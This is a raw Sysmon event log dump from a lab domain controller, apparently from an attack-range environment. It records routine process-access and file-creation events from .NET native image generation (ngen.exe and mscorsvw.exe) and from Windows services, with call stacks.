13:46:41.641{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-9141-6005-3F02-00000000A301}4784C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006382Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:41.626{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-9141-6005-3F02-00000000A301}4784C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006381Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:41.626{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-9141-6005-3F02-00000000A301}4784C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006380Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:41.501{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-9141-6005-3E02-00000000A301}4744C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006379Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:41.501{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-9141-6005-3E02-00000000A301}4744C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006378Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:41.501{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-9141-6005-3E02-00000000A301}4744C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006377Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:41.407{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-9141-6005-3D02-00000000A301}4796C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006376Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:41.407{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-9141-6005-3D02-00000000A301}4796C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006375Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:41.407{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-9141-6005-3D02-00000000A301}4796C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000006374Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:46:41.344{59A5CD1D-9141-6005-3C02-00000000A301}1040C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\410-0\SMDiagnostics.dll2021-01-18 13:46:41.344 10341000x80000000000000006373Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:41.251{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-9141-6005-3C02-00000000A301}1040C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006372Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:41.235{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-9141-6005-3C02-00000000A301}1040C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006371Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:41.235{59A5CD1D-90A0-6005-2E01-00000000A301}47124864C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-9141-6005-3C02-00000000A301}1040C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+91db|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9168|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8fc5|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006370Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:41.188{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-9141-6005-3B02-00000000A301}4816C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006369Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:41.188{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-9141-6005-3B02-00000000A301}4816C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006368Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:41.188{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-9141-6005-3B02-00000000A301}4816C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006367Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:41.141{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-9141-6005-3A02-00000000A301}2872C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006366Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:41.141{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-9141-6005-3A02-00000000A301}2872C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006365Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:41.141{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-9141-6005-3A02-00000000A301}2872C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000006364Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:46:41.001{59A5CD1D-913D-6005-3902-00000000A301}4104C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\1008-0\ReachFramework.dll2021-01-18 13:46:41.001 10341000x80000000000000006399Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:44.719{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-9144-6005-4102-00000000A301}4804C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006398Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:44.719{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006397Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:44.719{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006396Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:44.719{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006395Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:44.719{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006394Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:44.719{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 